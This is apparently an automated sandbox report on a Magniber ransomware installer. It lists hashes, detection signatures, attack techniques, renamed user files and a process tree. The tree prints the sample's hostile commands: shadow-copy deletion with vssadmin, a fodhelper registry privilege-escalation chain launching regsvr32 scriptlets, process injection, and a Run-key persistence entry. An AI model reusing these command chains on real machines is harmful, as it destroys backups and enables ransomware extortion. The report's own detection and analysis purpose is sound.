magniber | fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-11-2022 22:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
Size

1.1MB
MD5

250a23219a576180547734430d71b0e6
SHA1

a5bcdb824d325d44c5e0feb5bf9389da520e6f82
SHA256

fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55
SHA512

e0c26cceff37d9328dddc9989ff75070b51a3ccd35c93e82fdcda3a828a90ac53d8604524f5195cc9d4865aa8680ccfd79f6d85710b46496ab9efea321c13417
SSDEEP

1536:j66iqjTbG3VvotZmMi0W7Ap0Ds0Dm78x:jAGelvoW0dQx

Score

10^/10

magniber persistence ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2492-145-0x000002846D080000-0x000002846D083000-memory.dmp	family_magniber
behavioral2/memory/1808-144-0x0000014B99C80000-0x0000014B99D8F000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\FormatExit.tif => C:\Users\Admin\Pictures\FormatExit.tif.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\InvokeSwitch.tif => C:\Users\Admin\Pictures\InvokeSwitch.tif.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\MountSubmit.png => C:\Users\Admin\Pictures\MountSubmit.png.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\PingBlock.tif => C:\Users\Admin\Pictures\PingBlock.tif.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\AddPop.crw => C:\Users\Admin\Pictures\AddPop.crw.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\ProtectCheckpoint.raw => C:\Users\Admin\Pictures\ProtectCheckpoint.raw.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\CompleteSend.tif => C:\Users\Admin\Pictures\CompleteSend.tif.yuyevbg	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

1808 MsiExec.exe
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe

pid	process
1808	MsiExec.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 1808 set thread context of 2492	1808	MsiExec.exe	sihost.exe
PID 1808 set thread context of 2504	1808	MsiExec.exe	svchost.exe
PID 1808 set thread context of 2688	1808	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\f499c1c6-cf61-46d7-b543-848af4049109.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221105234550.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIEB31.tmp	msiexec.exe
File created	C:\Windows\Installer\e56e498.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e56e498.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\e56e49a.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE5A2.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{8B0F0F68-120B-4579-87C8-8B074F5D9DFD}	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000dcccb42f1bc641320000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000dcccb42f0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900dcccb42f000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000dcccb42f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000dcccb42f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

4000 vssadmin.exe
4040 vssadmin.exe
276 vssadmin.exe
3872 vssadmin.exe
5180 vssadmin.exe
4968 vssadmin.exe

pid	process
4000	vssadmin.exe
4040	vssadmin.exe
276	vssadmin.exe
3872	vssadmin.exe
5180	vssadmin.exe
4968	vssadmin.exe

Modifies registry class 15 IoCs

Processes:

regsvr32.exeregsvr32.exeregsvr32.exesihost.exemsedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
1428	msiexec.exe
1428	msiexec.exe
1808	MsiExec.exe
1808	MsiExec.exe
4072	msedge.exe
4072	msedge.exe
2096	msedge.exe
2096	msedge.exe
5640	identity_helper.exe
5640	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

1808 MsiExec.exe
1808 MsiExec.exe
1808 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

2096 msedge.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe

pid	process
1808	MsiExec.exe
1808	MsiExec.exe
1808	MsiExec.exe

pid	process
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	4468	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4468	msiexec.exe
Token: SeSecurityPrivilege	1428	msiexec.exe
Token: SeCreateTokenPrivilege	4468	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4468	msiexec.exe
Token: SeLockMemoryPrivilege	4468	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4468	msiexec.exe
Token: SeMachineAccountPrivilege	4468	msiexec.exe
Token: SeTcbPrivilege	4468	msiexec.exe
Token: SeSecurityPrivilege	4468	msiexec.exe
Token: SeTakeOwnershipPrivilege	4468	msiexec.exe
Token: SeLoadDriverPrivilege	4468	msiexec.exe
Token: SeSystemProfilePrivilege	4468	msiexec.exe
Token: SeSystemtimePrivilege	4468	msiexec.exe
Token: SeProfSingleProcessPrivilege	4468	msiexec.exe
Token: SeIncBasePriorityPrivilege	4468	msiexec.exe
Token: SeCreatePagefilePrivilege	4468	msiexec.exe
Token: SeCreatePermanentPrivilege	4468	msiexec.exe
Token: SeBackupPrivilege	4468	msiexec.exe
Token: SeRestorePrivilege	4468	msiexec.exe
Token: SeShutdownPrivilege	4468	msiexec.exe
Token: SeDebugPrivilege	4468	msiexec.exe
Token: SeAuditPrivilege	4468	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4468	msiexec.exe
Token: SeChangeNotifyPrivilege	4468	msiexec.exe
Token: SeRemoteShutdownPrivilege	4468	msiexec.exe
Token: SeUndockPrivilege	4468	msiexec.exe
Token: SeSyncAgentPrivilege	4468	msiexec.exe
Token: SeEnableDelegationPrivilege	4468	msiexec.exe
Token: SeManageVolumePrivilege	4468	msiexec.exe
Token: SeImpersonatePrivilege	4468	msiexec.exe
Token: SeCreateGlobalPrivilege	4468	msiexec.exe
Token: SeBackupPrivilege	4892	vssvc.exe
Token: SeRestorePrivilege	4892	vssvc.exe
Token: SeAuditPrivilege	4892	vssvc.exe
Token: SeBackupPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe
Token: SeTakeOwnershipPrivilege	1428	msiexec.exe
Token: SeRestorePrivilege	1428	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

msiexec.exemsedge.exe

pid process

4468 msiexec.exe
4468 msiexec.exe
2096 msedge.exe
2096 msedge.exe
2096 msedge.exe

pid	process
4468	msiexec.exe
4468	msiexec.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 1428 wrote to memory of 5068	1428	msiexec.exe	srtasks.exe
PID 1428 wrote to memory of 5068	1428	msiexec.exe	srtasks.exe
PID 1428 wrote to memory of 1808	1428	msiexec.exe	MsiExec.exe
PID 1428 wrote to memory of 1808	1428	msiexec.exe	MsiExec.exe
PID 2492 wrote to memory of 4304	2492	sihost.exe	regsvr32.exe
PID 2492 wrote to memory of 4304	2492	sihost.exe	regsvr32.exe
PID 2504 wrote to memory of 3716	2504	svchost.exe	regsvr32.exe
PID 2504 wrote to memory of 3716	2504	svchost.exe	regsvr32.exe
PID 2688 wrote to memory of 3176	2688	taskhostw.exe	regsvr32.exe
PID 2688 wrote to memory of 3176	2688	taskhostw.exe	regsvr32.exe
PID 1808 wrote to memory of 4964	1808	MsiExec.exe	cmd.exe
PID 1808 wrote to memory of 4964	1808	MsiExec.exe	cmd.exe
PID 4964 wrote to memory of 2096	4964	cmd.exe	msedge.exe
PID 4964 wrote to memory of 2096	4964	cmd.exe	msedge.exe
PID 2096 wrote to memory of 3140	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3140	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 760	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 4072	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 4072	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3604	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3604	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3604	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3604	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3604	2096	msedge.exe	msedge.exe
PID 2096 wrote to memory of 3604	2096	msedge.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:4304
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:1540
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:2704
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:4480
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4968
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:5852
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:6076
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5204
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5180

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2504
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:3716
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4968
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5016
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:4176
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4000
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:5860
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5996
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:6124
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:276

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:3176
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:3484
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:1424
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:3880
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4040
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:5876
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:6008
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:6136
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3872

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4468

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1428
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:5068
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 3CA35443B02549CB630B1075E6F6391E
  2⤵
  - Modifies extensions of user files
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Windows\System32\cmd.exe
    cmd /c "start microsoft-edge:http://d8dc9020ccyuyevbg.diedsad.info/yuyevbg^&1^&45213661^&107^&451^&2219041
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://d8dc9020ccyuyevbg.diedsad.info/yuyevbg&1&45213661&107&451&2219041
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbbb7c46f8,0x7ffbbb7c4708,0x7ffbbb7c4718
        5⤵
        
        PID:3140
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
